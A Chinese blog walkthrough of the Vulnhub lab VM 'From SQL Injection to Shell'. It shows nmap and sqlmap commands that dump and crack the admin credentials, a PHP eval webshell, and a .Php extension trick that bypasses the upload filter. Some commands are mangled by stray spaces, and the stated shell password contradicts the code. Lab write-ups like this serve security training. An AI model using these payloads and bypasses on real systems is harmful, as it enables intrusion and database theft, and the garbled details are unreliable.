document.οnkeydοwn=function (e){ var currKey=0,evt=e||window.event; currKey=evt.keyCode||evt.which||evt.charCode; if (currKey == 123) { window.event.cancelBubble = true; window.event.returnValue = false; } }

Vulnhub经典靶机:from_sqli_to_shell_i386入门靶机

靶机官网:

https://www.vulnhub.com/entry/pentester-lab-from-sql-injection-to-shell,80/

靶机镜像ISO下载地址:(转链)

from_sqli_to_shell_i386.iso - 4275.COM


一、启动靶机


二、查找靶机 IP 地址(2种方法)

1.使用 netdiscover 命令

在 Kali 终端中,输入 netdiscover 命令,该命令会自动扫描局域网内的活跃主机,尝试查找靶机的 IP 地址。

netdiscover

2.使用 arp - scan 命令

执行 arp - scan - l - D 命令,对同网段下的主机进行扫描。此命令通过发送 ARP 请求并接收响应,来获取局域网内设备的 IP 地址和 MAC 地址信息。

arp-scan -l -D


三、端口扫描与服务探测

1.全端口扫描

nmap --min - rate 10000 - p - 192.168.16.132 命令对靶机进行全端口扫描。该命令以较高的扫描速率(每分钟至少 10000 个数据包)探测靶机上开放的所有 TCP 端口。扫描结果显示,靶机开放了 22 端口(SSH 服务)和 80 端口(HTTP 服务)。

nmap --min - rate 10000 - p - 192.168.16.132

2.对80端口详细扫描

针对开放的 80 端口,执行 nmap - sT - sC - sV - O - p80 192.168.16.132 命令。此命令在进行 TCP 连接扫描(-sT)的同时,还会运行一系列默认脚本(-sC)来检测常见的漏洞和服务信息,获取服务版本(-sV)以及尝试识别靶机操作系统(-O)。扫描结果表明,80 端口运行的是 Apache httpd 2.2.16 版本(基于 Debian 系统),操作系统为 Linux,内核版本在 2.6.32 - 2.6.35 之间。

nmap - sT - sC - sV - O - p80 192.168.16.132


四、浏览器访问靶机 IP

在确定靶机开放 80 端口且运行着 Web 服务后,我们在浏览器中输入靶机 IP 地址 192.168.16.132 进行访问。打开页面后,呈现出一个名为 “My Awesome Photoblog” 的网站,页面展示了一些图片相关的内容,如 “last picture: cthulhu” 等信息,同时右侧有 “Admin” 选项卡。


五、寻找sql注入漏洞(2种方法)

1.nmap漏洞脚本扫描

使用 nmap --script = vuln - p80 192.168.16.132 命令尝试利用 nmap 的漏洞脚本扫描 80 端口的漏洞。

nmap --script = vuln - p80 192.168.16.132 

发现了了大量的SQL注入点:

| http-sql-injection: 
|   Possible sqli for queries:
|     http://192.168.16.132:80/cat.php?id=2' OR sqlspider
|     http://192.168.16.132:80/cat.php?id=1' OR sqlspider
|     http://192.168.16.132:80/cat.php?id=3' OR sqlspider

2.从页面url中id参数下手,找sql注入点

(1)发现登录Admin后台界面与潜在 SQL 注入漏洞

点击 “Admin” 选项卡后,进入到一个后台管理的登录界面。

为了登录成功,我们需要找到有效的用户名和密码。

在对网站进行初步探索时,我们点击了右侧的各个选项卡,并观察每个页面的 URL。

发现多个页面都是通过 GET 方式将参数 id 传递给 cat.php 文件来获取不同的内容,例如访问 192.168.16.132/cat.php?id = 1192.168.16.132/cat.php?id = 2 等不同的 id 值会返回不同的图片信息。这种动态参数传递的方式存在 SQL 注入的可能性,因为攻击者可能通过构造恶意的 id 参数值来篡改数据库查询逻辑。

(2)确定 SQL 注入点

为了验证 SQL 注入点的存在,我们使用万能测试语句 “or 1 = 1#” 进行测试。将其添加到 URL 参数中,即访问 192.168.16.132/cat.php?id = 1 or 1 = 1#

经过测试,页面内容发生改变且符合预期,显示了更多的图片信息,这表明成功找到了 SQL 注入点。


六、SQL 注入漏洞利用与信息获取

1.使用 sqlmap 扫描数据库

确定注入点后,我们借助强大的 sqlmap 工具来进一步探索数据库信息。

执行下面命令(2选一):

sqlmap - u "http://192.168.16.132/cat.php?id = 1" --dbs --batch​
sqlmap -u "http://192.168.16.132:80/cat.php?id=2%27%20OR%20sqlspider" -dbs

会自动检测并利用注入点,尝试获取数据库列表。

fetching database names:

available databases [2]:
[*] information_schema
[*] photoblog

扫描结果显示靶机存在两个数据库,分别是 information_schema(MySQL 系统数据库,用于存储数据库元数据信息)和 photoblog(该摄影博客网站应用所使用的数据库)。

2.爆破 photoblog 数据库中的表

接着,我们对 photoblog 数据库中的表进行爆破。使用 sqlmap - u "http://192.168.16.132/cat.php?id = 1" - D photoblog --tables --batch 命令,sqlmap 将尝试获取 photoblog 数据库中的所有表名。

​sqlmap - u "http://192.168.16.132/cat.php?id = 1" - D photoblog --tables --batch

经过一段时间的扫描,成功获取到三个表名:categories(可能用于存储图片分类信息)、pictures(可能存储图片相关数据)和 users(推测用于存储用户信息)。

3.获取 users 表的字段名

进一步深入,我们需要获取 users 表中的字段名。执行 sqlmap - u "http://192.168.16.132/cat.php?id = 1" - D photoblog - T users --columns --batch 命令。

​sqlmap - u "http://192.168.16.132/cat.php?id = 1" - D photoblog - T users --columns --batch

sqlmap 成功获取到 users 表中的三个字段:id(数据类型为 mediumint (9),可能是用户 ID)、login(varchar (50),推测为用户名)和 password(varchar (50),显然是用户密码)。

4.获取 users 表中的用户数据

最后,我们使用 sqlmap - u "http://192.168.16.132/cat.php?id = 1" - D photoblog - T users - C id,login,password --dump --batch 命令来获取 users 表中这些字段的具体文本内容。

​sqlmap - u "http://192.168.16.132/cat.php?id = 1" - D photoblog - T users - C id,login,password --dump --batch

经过爆破,我们成功获取到一条用户记录,其中用户名是 “admin”,密码的 MD5 值为 “8efe310f9ab3efeae8d410a8e0166eb2”。幸运的是,sqlmap 直接为我们解密了密码的 MD5 值,得到密码为 “P4ssw0rd”。

5.登录后台管理系统

有了用户名和密码,我们返回登录界面,输入 “admin” 和 “P4ssw0rd” 进行登录。

登录成功后,进入到后台管理页面,页面显示了图片管理相关的功能,包括查看图片、删除图片以及添加新图片等操作。

这个表是一个图片表,名称是一个herf,可以直接查看,后面的delete应该也是可以删除这张图片


七、文件上传漏洞利用与获取 Shell

1.文件上传功能测试

在后台管理页面中,我们注意到 “Add a new picture” 按钮,点击后发现可以上传文件。这意味着着可能存在通过文件上传功能获取更高权限的途径,例如上传恶意文件(如病毒木马)来控制靶机。

2.上传 PHP 文件失败

<?php
@eval($_POST['webshell']);
?>

在 Kali 系统中,我们创建一个包含一句话木马的 PHP 文件(命名为abc.php),尝试通过文件上传功能将其上传到靶机。

、然而,上传失败!靶机显示 “No PHP!!”,这表明靶机对上传的文件进行了过滤,禁止直接上传 PHP 文件。

3.绕过文件上传过滤

经过初步分析,猜测靶机是通过检测文件后缀名来过滤上传文件的,即禁止上传后缀名为.php 的文件。为了绕过这个限制,我们将 PHP 文件的后缀名由原来的.php修改为.Php,然后再次尝试上传。

这次上传成功了,这进一步证实了我们的猜测,即靶机的上传检测机制仅针对文件后缀名,而未对文件内容进行检测。

4.寻找上传文件的存储位置

虽然上传的文件(伪装成.Php格式)成功上传到了靶机,但由于其实际上是一个 PHP 文件,我们需要找到一种方法使其能够被服务器解析为 PHP 脚本,从而执行我们的木马代码。

为此,我们使用 dirb 命令扫描网站后台目录,希望找到上传文件的存储位置。

​dirb http://192.168.16.132

执行 dirb http://192.168.16.132命令后,我们发现了一个名为 “uploads” 的目录,根据其名称和网站的逻辑,我们推测上传的文件很可能保存在这个目录中

5.确认上传文件的访问路径

(1)查找上传文件的保存目录

​dirb http://192.168.16.132/admin/uploads - w

为了验证我们的推测,我们使用 dirb 命令再次查看指定目录,执行 dirb http://192.168.16.132/admin/uploads - w 命令。

​dirb http://192.168.16.132/admin/uploads - w

(2)通过后缀名.Php来验证文件保存位置

​dirb http://192.168.16.132/admin/uploads - w -X .Php

从扫描结果中,我们成功找到了我们上传的文件 “abc.Php”。并且发现其访问路径为http://192.168.16.132/admin/uploads/abc.Php

6.访问上传文件并获取 Shell

在浏览器中访问http://192.168.16.132/admin/uploads/abc.Php,如果一切顺利,我们的一句话木马将被执行,此时我们可以使用工具(如中国蚁剑或其他类似的 WebShell 管理工具)连接到这个地址,通过在工具中输入密码(这里是 “cmd”,与我们在一句话木马中设置的密码一致),成功连接后,我们就获取了靶机的 Shell 权限,可以在靶机上执行各种命令,进一步深入探索靶机系统,完成渗透测试的目标。


9853ba67-90cf-43c8-85b6-b843521a0946

posted @ 2024-12-23 20:32  mingkai2004  阅读(93)  评论(0编辑  收藏  举报  来源